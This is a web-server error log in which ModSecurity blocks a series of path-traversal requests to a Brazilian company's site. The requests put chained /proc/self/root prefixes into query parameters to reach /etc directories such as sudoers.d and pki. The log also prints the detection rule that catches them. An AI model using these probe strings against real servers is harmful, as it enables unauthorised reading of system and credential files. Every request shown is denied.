[Fri Mar 20 04:04:51.961175 2026] [:error] [pid 31215:tid 140411725141760] [client 74.7.241.31:59962] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxkwF0L0L-SsrnPo47bQAAAsI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:04:52.337473 2026] [:error] [pid 31215:tid 140411557287680] [client 74.7.243.128:41238] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxlAF0L0L-SsrnPo47bgAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:04:53.604143 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.243.128:41240] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxleoXxyEfFpUF8f9XBwAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:04:54.470849 2026] [:error] [pid 7235:tid 140411582465792] [client 74.7.241.31:59970] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxlvqxLDW4GITHUkS1RAAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:04:54.914999 2026] [:error] [pid 11167:tid 140411582465792] [client 74.7.243.128:41242] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxlvHIg5MgXLBnicPOuAAAAdM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:04:57.279020 2026] [:error] [pid 9818:tid 140411691570944] [client 74.7.243.128:41256] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxmV1pVZ5mVmJwsFMEfAAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:05:00.894993 2026] [:error] [pid 11642:tid 140411666392832] [client 74.7.241.31:59984] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxnLninkcc-iUj5AoxBAAAA4k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:05:03.185952 2026] [:error] [pid 7235:tid 140411632822016] [client 74.7.243.128:41258] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxn_qxLDW4GITHUkS1TgAAAQ0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:05:04.954592 2026] [:error] [pid 9818:tid 140411683178240] [client 74.7.241.31:44134] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxoF1pVZ5mVmJwsFMEgwAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:05:06.398720 2026] [:error] [pid 11642:tid 140411741927168] [client 74.7.243.128:41232] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxorninkcc-iUj5AoxCgAAA4A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:05:07.729176 2026] [:error] [pid 10189:tid 140411641214720] [client 74.7.243.128:41242] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxozJ3M9BSuKP7CAbj5wAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:05:08.981576 2026] [:error] [pid 21219:tid 140411616036608] [client 74.7.243.128:41244] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxpPXLqtnMIWvjpaJslgAAAo8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:05:10.761265 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.243.128:50478] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxpuoXxyEfFpUF8f9XHgAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:05:13.043807 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:50484] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxqeoXxyEfFpUF8f9XIgAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:05:14.418675 2026] [:error] [pid 11642:tid 140411590858496] [client 74.7.243.128:50496] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxqrninkcc-iUj5AoxDgAAA5I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:05:16.748607 2026] [:error] [pid 21219:tid 140411649607424] [client 74.7.243.128:50500] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxrPXLqtnMIWvjpaJsmgAAAos"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:05:18.018768 2026] [:error] [pid 9818:tid 140411708356352] [client 74.7.243.128:50506] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxrl1pVZ5mVmJwsFMEigAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:05:19.298933 2026] [:error] [pid 7893:tid 140411658000128] [client 74.7.243.128:50512] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxrxCii7xarUs8iHY4RQAAAgo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:05:20.399142 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:34898] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxsNa6ubjKNq_cu4aigwAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:05:21.705590 2026] [:error] [pid 21219:tid 140411574073088] [client 74.7.243.128:34914] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxsfXLqtnMIWvjpaJsngAAApQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:05:22.980298 2026] [:error] [pid 31215:tid 140411540502272] [client 74.7.243.128:34926] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxsgF0L0L-SsrnPo47ewAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:05:25.431185 2026] [:error] [pid 7235:tid 140411607643904] [client 74.7.243.128:34932] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxtfqxLDW4GITHUkS1bAAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
